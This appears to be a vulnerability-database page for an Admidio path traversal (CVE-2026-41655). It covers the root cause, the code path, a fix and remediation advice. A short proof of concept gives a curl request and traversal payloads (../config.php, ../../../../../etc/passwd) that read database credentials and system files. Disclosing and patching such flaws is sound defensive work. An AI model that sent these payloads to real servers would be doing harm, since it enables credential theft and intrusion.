Skip to main content

Admidio CVE-2026-41655

| EUVDEUVD-2026-28263 MEDIUM
Path Traversal (CWE-22)
2026-04-29 https://github.com/Admidio/admidio GHSA-m3vp-3jjm-gpmx
6.5
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
6.5 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

4
Source Code Evidence Fetched
Apr 29, 2026 - 22:15 vuln.today
Analysis Generated
Apr 29, 2026 - 22:15 vuln.today
Analysis Generated
Apr 29, 2026 - 22:00 vuln.today
CVE Published
Apr 29, 2026 - 21:37 nvd
MEDIUM 6.5

DescriptionGitHub Advisory

Summary

The ecard_preview.php endpoint does not validate that the ecard_template POST parameter is a safe filename before passing it to ECard::getEcardTemplate(). An authenticated user can supply a path traversal payload (e.g., ../config.php) to read arbitrary files accessible to the web server process, including adm_my_files/config.php which contains database credentials.

Details

Root Cause: The ecard_template parameter is a select box whose value is only sanitized via strStripTags() during form validation, which does not restrict path traversal characters. Unlike ecard_send.php which explicitly validates the template name as a safe filename, ecard_preview.php omits this check entirely.

Code Path:

  1. modules/photos/ecards.php:143-152 - The form creates a select box with template filenames from adm_my_files/ecard_templates/. The form object is stored in the session.
  2. modules/photos/ecard_preview.php:33-34 - The POST request is validated against the stored form object:
php
$categoryEditForm = $gCurrentSession->getFormObject($_POST['adm_csrf_token']);
$formValues = $categoryEditForm->validate($_POST);
  1. src/UI/Presenter/FormPresenter.php:2190-2243 - The validate() method applies StringUtils::strStripTags() to all values and performs type-specific checks for captcha, date, editor, email, number, url, and uuid - but has no validation case for select box values. The attacker-controlled value ../config.php passes through unchanged.
  2. modules/photos/ecard_preview.php:48 - The unvalidated value is passed directly to getEcardTemplate():
php
$ecardDataToParse = $funcClass->getEcardTemplate($formValues['ecard_template']);
  1. src/Photos/ValueObject/ECard.php:67-77 - The filename is concatenated into the path and opened:
php
public function getEcardTemplate(string $tplFilename, string $tplFolder = ''): ?string
{
    if ($tplFolder === '') {
        $tplFolder = ADMIDIO_PATH . FOLDER_DATA . '/ecard_templates/';
    }
    // ...
    $fileHandle = @fopen($tplFolder . $tplFilename, 'rb');

With $tplFilename = '../config.php', this resolves to ADMIDIO_PATH/adm_my_files/ecard_templates/../config.phpADMIDIO_PATH/adm_my_files/config.php.

Why ecard_send.php is NOT vulnerable: At line 35, it independently validates the template name:

php
$postTemplateName = admFuncVariableIsValid($_POST, 'ecard_template', 'file', array('requireValue' => true));

This calls strIsValidFileName() which checks basename($filename) !== $filename, blocking any path traversal. The preview endpoint lacks this check.

PoC

bash
# Step 1: Log in and visit the ecard form to create a session with a form object
# Navigate to: /modules/photos/ecards.php?photo_uuid=<valid_album_uuid>&photo_nr=1
# Extract the adm_csrf_token from the rendered form HTML
# Step 2: Send path traversal payload to read config.php (contains DB credentials)
curl -b 'PHPSESSID=<session_cookie>' \
  -X POST 'https://target/modules/photos/ecard_preview.php' \
  -d 'adm_csrf_token=<csrf_token>&ecard_template=../config.php&ecard_message=test&photo_uuid=<valid_uuid>&photo_nr=1&submit_action=preview'
# The response body will contain the contents of adm_my_files/config.php
# rendered inside the ecard preview HTML, including:
#   $g_adm_srv (database host)
#   $g_adm_db  (database name)
#   $g_adm_usr (database username)
#   $g_adm_pw  (database password)
# To traverse further outside adm_my_files:
# ecard_template=../../system/bootstrap/constants.php  (reads PHP source)
# ecard_template=../../../../../etc/passwd              (reads system files)

Impact

  • Database credential disclosure: Any authenticated user can read adm_my_files/config.php, exposing database host, name, username, and password. If the database is network-accessible, this enables full database compromise.
  • Source code disclosure: Arbitrary PHP files can be read, revealing application logic, internal paths, and potentially other secrets.
  • System file disclosure: With sufficient traversal depth (../../../../../etc/passwd), system files can be read, aiding further attacks.
  • Low barrier to exploit: Only requires a regular member account - no admin privileges needed.

Recommended Fix

Add filename validation to ecard_preview.php before passing the template name to getEcardTemplate(), matching the validation already present in ecard_send.php:

php
// In modules/photos/ecard_preview.php, add BEFORE line 48:
$postTemplateName = admFuncVariableIsValid(
    $formValues, 'ecard_template', 'file', array('requireValue' => true)
);
$ecardDataToParse = $funcClass->getEcardTemplate($postTemplateName);

Alternatively, add select box value validation to FormPresenter::validate() to verify that submitted select box values match one of the predefined options, which would protect all select boxes across the application:

php
// In src/UI/Presenter/FormPresenter.php, inside the switch statement in validate():
case 'select':
    if (isset($element['values']) && !array_key_exists($fieldValues[$element['id']], $element['values'])) {
        throw new Exception('SYS_FIELD_INVALID_INPUT', array($element['label']));
    }
    break;

AnalysisAI

Path traversal in Admidio ecard_preview.php allows authenticated users to read arbitrary server files including database credentials by bypassing filename validation on the ecard_template POST parameter. An authenticated attacker can supply path traversal payloads such as ../config.php to read adm_my_files/config.php containing unencrypted database host, username, and password, or traverse further to access system files. Exploitation requires only a regular member account with no special privileges, making this a high-impact vulnerability accessible to any registered user.

Technical ContextAI

Admidio's ecard preview functionality processes electronic greeting card templates through the ecard_preview.php endpoint. The vulnerability stems from incomplete input validation in the form processing pipeline. When the ecard form is submitted, the ecard_template parameter passes through FormPresenter::validate() which applies only strStripTags() sanitization to select box values-a function designed to remove HTML tags but not to restrict path traversal characters like ../ and /. This contrasts with ecard_send.php which explicitly calls admFuncVariableIsValid() with 'file' type validation that invokes strIsValidFileName() to reject any path containing directory traversal sequences. The unvalidated filename is then concatenated directly into a file path in ECard::getEcardTemplate() and passed to PHP's fopen() function, allowing the ../ sequences to escape the intended ecard_templates directory and access parent directories including the sensitive config.php file. CWE-22 (Path Traversal) is the root cause-insufficient canonicalization or restriction of paths containing special elements.

RemediationAI

Update Admidio to version 5.0.9 or later immediately-this is the vendor-released patch that adds filename validation to ecard_preview.php matching the existing validation in ecard_send.php. The patch implements the recommended fix by calling admFuncVariableIsValid() with 'file' type validation on the ecard_template parameter before passing it to getEcardTemplate(), blocking any path traversal sequences. If immediate patching is not feasible, implement compensating controls: (1) Use web server configuration (Apache mod_rewrite or nginx rewrite rules) to block POST requests to ecard_preview.php containing ../ in the request body, though this is fragile; (2) Restrict database user permissions to only the minimum required tables, limiting the impact if config.php is leaked and credentials are compromised; (3) Implement strict file permissions so adm_my_files/config.php is not world-readable and rotate database credentials immediately; (4) Consider disabling the ecard feature entirely via Admidio's module management if ecards are not essential to your deployment. The most effective interim measure is credential rotation plus strict file permission hardening, as the vulnerability cannot be fully mitigated without the code patch. Reference vendor advisory for patch instructions: https://github.com/Admidio/admidio/security/advisories/GHSA-m3vp-3jjm-gpmx

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-41655 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy